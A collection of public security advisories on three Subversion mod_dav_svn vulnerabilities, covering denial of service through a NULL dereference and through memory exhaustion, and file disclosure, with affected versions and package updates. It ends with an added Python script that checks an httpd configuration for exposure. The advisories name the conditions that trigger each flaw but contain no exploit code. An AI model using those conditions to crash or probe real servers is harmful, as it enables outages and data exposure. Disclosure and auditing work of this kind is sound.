The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011. Apache Subversion is prone to multiple vulnerabilities, including two denial-of-service issues and an information-disclosure issue.
Attackers can exploit these issues to crash the application, exhaust all memory resources, or obtain potentially sensitive information.
Versions prior to Subversion 1.6.17 are vulnerable.
The mod_dav_svn Apache HTTPD server module may in certain scenarios
enter a logic loop which does not exit and which allocates memory in
each iteration, ultimately exhausting all the available memory on the
server which can lead to a DoS (Denial Of Service) (CVE-2011-1783).
The mod_dav_svn Apache HTTPD server module may leak to remote users
the file contents of files configured to be unreadable by those users
(CVE-2011-1921).
Packages for 2009.0 are provided as of the Extended Maintenance
Program. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFN6cg2mqjQ0CJFipgRAqj2AKCRyKt813e0OmWSTU5bL58KCmUwowCfT6RY
DDOtowgSctAg4EX+tLXIvRQ=
=zsmM
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria
See the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei.
Read more:
http://conference.first.org/
----------------------------------------------------------------------
TITLE:
Apache Subversion mod_dav_svn Two Denial of Service Vulnerabilities
SECUNIA ADVISORY ID:
SA44681
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44681/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
RELEASE DATE:
2011-06-02
DISCUSS ADVISORY:
http://secunia.com/advisories/44681/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44681/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Apache Subversion, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
SOLUTION:
Update to version 1.6.17.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
2) The vendor credits Ivan Zhakov, VisualSVN.
ORIGINAL ADVISORY:
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Low
Title: Subversion: Multiple vulnerabilities
Date: September 23, 2013
Bugs: #350166, #356741, #369065, #463728, #463860, #472202, #482166
ID: 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Subversion, allowing
attackers to cause a Denial of Service, escalate privileges, or obtain
sensitive information.
Background
==========
Subversion is a versioning system designed to be a replacement for CVS.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/subversion < 1.7.13 >= 1.7.13
Description
===========
Multiple vulnerabilities have been discovered in Subversion. Please
review the CVE identifiers referenced below for details.
Impact
======
A local attacker could escalate his privileges to the user running
svnserve.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Subversion users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-vcs/subversion-1.7.13"
References
==========
[ 1 ] CVE-2010-4539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4539
[ 2 ] CVE-2010-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4644
[ 3 ] CVE-2011-0715
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0715
[ 4 ] CVE-2011-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1752
[ 5 ] CVE-2011-1783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1783
[ 6 ] CVE-2011-1921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1921
[ 7 ] CVE-2013-1845
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1845
[ 8 ] CVE-2013-1846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1846
[ 9 ] CVE-2013-1847
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1847
[ 10 ] CVE-2013-1849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1849
[ 11 ] CVE-2013-1884
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1884
[ 12 ] CVE-2013-1968
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1968
[ 13 ] CVE-2013-2088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2088
[ 14 ] CVE-2013-2112
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2112
[ 15 ] CVE-2013-4131
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4131
[ 16 ] CVE-2013-4277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4277
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201309-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: subversion security update
Advisory ID: RHSA-2011:0862-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0862.html
Issue date: 2011-06-08
CVE Names: CVE-2011-1752 CVE-2011-1783 CVE-2011-1921
=====================================================================
1. Summary:
Updated subversion packages that fix three security issues are now
available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
3. Description:
Subversion (SVN) is a concurrent version control system which enables one
or more users to collaborate in developing and maintaining a hierarchy of
files and directories while keeping a history of all changes. The
mod_dav_svn module is used with the Apache HTTP Server to allow access to
Subversion repositories via HTTP.
An infinite loop flaw was found in the way the mod_dav_svn module processed
certain data sets. If the SVNPathAuthz directive was set to
"short_circuit", and path-based access control for files and directories
was enabled, a malicious, remote user could use this flaw to cause the
httpd process serving the request to consume an excessive amount of system
memory. (CVE-2011-1783)
A NULL pointer dereference flaw was found in the way the mod_dav_svn module
processed requests submitted against the URL of a baselined resource. A
malicious, remote user could use this flaw to cause the httpd process
serving the request to crash. (CVE-2011-1752)
An information disclosure flaw was found in the way the mod_dav_svn
module processed certain URLs when path-based access control for files and
directories was enabled. A malicious, remote user could possibly use this
flaw to access certain files in a repository that would otherwise not be
accessible to them. Note: This vulnerability cannot be triggered if the
SVNPathAuthz directive is set to "short_circuit". (CVE-2011-1921)
Upstream acknowledges Joe Schaefer of the Apache Software
Foundation as the original reporter of CVE-2011-1752; Ivan Zhakov of
VisualSVN as the original reporter of CVE-2011-1783; and Kamesh
Jayachandran of CollabNet, Inc. as the original reporter of CVE-2011-1921.
All Subversion users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing the
updated packages, you must restart the httpd daemon, if you are using
mod_dav_svn, for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
709111 - CVE-2011-1752 subversion (mod_dav_svn): DoS (crash) via request to deliver baselined WebDAV resources
709112 - CVE-2011-1783 subversion (mod_dav_svn): DoS (excessive memory use) when configured to provide path-based access control
709114 - CVE-2011-1921 subversion (mod_dav_svn): File contents disclosure of files configured to be unreadable by those users
6. Package List:
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
ia64:
mod_dav_svn-1.6.11-7.el5_6.4.ia64.rpm
subversion-1.6.11-7.el5_6.4.ia64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ia64.rpm
subversion-devel-1.6.11-7.el5_6.4.ia64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ia64.rpm
subversion-perl-1.6.11-7.el5_6.4.ia64.rpm
subversion-ruby-1.6.11-7.el5_6.4.ia64.rpm
ppc:
mod_dav_svn-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc64.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ppc.rpm
subversion-perl-1.6.11-7.el5_6.4.ppc.rpm
subversion-ruby-1.6.11-7.el5_6.4.ppc.rpm
s390x:
mod_dav_svn-1.6.11-7.el5_6.4.s390x.rpm
subversion-1.6.11-7.el5_6.4.s390.rpm
subversion-1.6.11-7.el5_6.4.s390x.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390x.rpm
subversion-devel-1.6.11-7.el5_6.4.s390.rpm
subversion-devel-1.6.11-7.el5_6.4.s390x.rpm
subversion-javahl-1.6.11-7.el5_6.4.s390x.rpm
subversion-perl-1.6.11-7.el5_6.4.s390x.rpm
subversion-ruby-1.6.11-7.el5_6.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
ppc64:
mod_dav_svn-1.6.11-2.el6_1.4.ppc64.rpm
subversion-1.6.11-2.el6_1.4.ppc.rpm
subversion-1.6.11-2.el6_1.4.ppc64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
mod_dav_svn-1.6.11-2.el6_1.4.s390x.rpm
subversion-1.6.11-2.el6_1.4.s390.rpm
subversion-1.6.11-2.el6_1.4.s390x.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
ppc64:
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc64.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc64.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc64.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
subversion-devel-1.6.11-2.el6_1.4.s390.rpm
subversion-devel-1.6.11-2.el6_1.4.s390x.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390x.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390x.rpm
subversion-kde-1.6.11-2.el6_1.4.s390.rpm
subversion-kde-1.6.11-2.el6_1.4.s390x.rpm
subversion-perl-1.6.11-2.el6_1.4.s390.rpm
subversion-perl-1.6.11-2.el6_1.4.s390x.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1752.html
https://www.redhat.com/security/data/cve/CVE-2011-1783.html
https://www.redhat.com/security/data/cve/CVE-2011-1921.html
https://access.redhat.com/security/updates/classification/#moderate
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFN75utXlSAg2UNWIIRAuXgAJ9fhhY1xxC7jRZbLGZA6ENr3dnTBQCgkdf0
J9nA8MJRlM/XVtyj3mbVErg=
=jujC
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. The Common Vulnerabilities and Exposures project
identifies the following problems:
CVE-2011-1752
The mod_dav_svn Apache HTTPD server module can be crashed when asked
to deliver baselined WebDAV resources.
For the oldstable distribution (lenny), this problem has been fixed in
version 1.5.1dfsg1-7.
For the stable distribution (squeeze), this problem has been fixed in
version 1.6.12dfsg-6.
For the unstable distribution (sid), this problem has been fixed in
version 1.6.17dfsg-1.
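The Red Hat description in this entry gives the three issues distinct preconditions: CVE-2011-1783 needs path-based access control with SVNPathAuthz set to "short_circuit", CVE-2011-1921 needs path-based access control without "short_circuit", and CVE-2011-1752 needs no particular configuration. The script below is an added example, not code from any of the advisories or from the Subversion project. It parses a constructed httpd configuration and, for each mod_dav_svn <Location>, reports which of the three issues its settings expose when the upstream version is below 1.6.17. The sample configuration, its repository paths and the version strings are made up for the demonstration; the SVNPathAuthz default of On is taken from the mod_dav_svn documentation, and the parser's inheritance of server-wide directives into blocks is a simplification of httpd's merge rules.

```python
import re

FIXED_IN = (1, 6, 17)  # upstream fix version, per the advisories in this entry

# Constructed sample httpd configuration (not from the page): three
# mod_dav_svn locations with different authorization settings.
SAMPLE_HTTPD_CONF = """
LoadModule dav_svn_module modules/mod_dav_svn.so
LoadModule authz_svn_module modules/mod_authz_svn.so

<Location /svn/public>
    DAV svn
    SVNParentPath /srv/svn
</Location>

# path-based access control, short-circuit mode
<Location /svn/private>
    DAV svn
    SVNParentPath /srv/svn
    AuthzSVNAccessFile /etc/httpd/svn-authz
    SVNPathAuthz short_circuit
</Location>

# path-based access control, SVNPathAuthz left at its default (On)
<Location /svn/legacy>
    DAV svn
    SVNPath /srv/svn/legacy
    AuthzSVNAccessFile /etc/httpd/svn-authz
</Location>
"""

_LOC_OPEN = re.compile(r'^<Location\s+(\S+?)\s*>$', re.I)
_LOC_CLOSE = re.compile(r'^</Location\s*>$', re.I)
_VERSION = re.compile(r'(\d+)\.(\d+)\.(\d+)')


def parse_version(text):
    """Extract the upstream x.y.z from strings such as '1.6.12dfsg-4ubuntu2.1'
    or the first line of `svn --version`; distro release tags are ignored."""
    m = _VERSION.search(text)
    if not m:
        raise ValueError("no x.y.z version found in %r" % text)
    return tuple(int(g) for g in m.groups())


def parse_locations(conf):
    """Return {location_path: {directive_lower: value}} for every <Location>
    block. Directives outside any block act as server-wide defaults that the
    blocks inherit (a simplification of httpd's merge rules, enough for the
    directives that matter here)."""
    server, blocks = {}, {}
    current, current_path = None, None
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = _LOC_OPEN.match(line)
        if m:
            current_path, current = m.group(1), dict(server)
            continue
        if _LOC_CLOSE.match(line):
            blocks[current_path] = current
            current, current_path = None, None
            continue
        parts = line.split(None, 1)
        value = parts[1] if len(parts) > 1 else ''
        (server if current is None else current)[parts[0].lower()] = value
    return blocks


def assess(conf, version_text):
    """Map each mod_dav_svn location to the CVEs its settings expose, using
    the preconditions stated in the Red Hat advisory text."""
    findings = {}
    if parse_version(version_text) >= FIXED_IN:
        return findings
    for path, d in parse_locations(conf).items():
        if d.get('dav', '').lower() != 'svn':
            continue  # not served by mod_dav_svn
        # CVE-2011-1752 (crash on a baselined resource) has no config precondition.
        cves = ['CVE-2011-1752']
        path_authz = 'authzsvnaccessfile' in d
        mode = d.get('svnpathauthz', 'on').lower()  # mod_dav_svn default is On
        if path_authz and mode == 'short_circuit':
            cves.append('CVE-2011-1783')  # unbounded memory use
        elif path_authz:
            cves.append('CVE-2011-1921')  # disclosure; only short_circuit prevents it
        findings[path] = cves
    return findings


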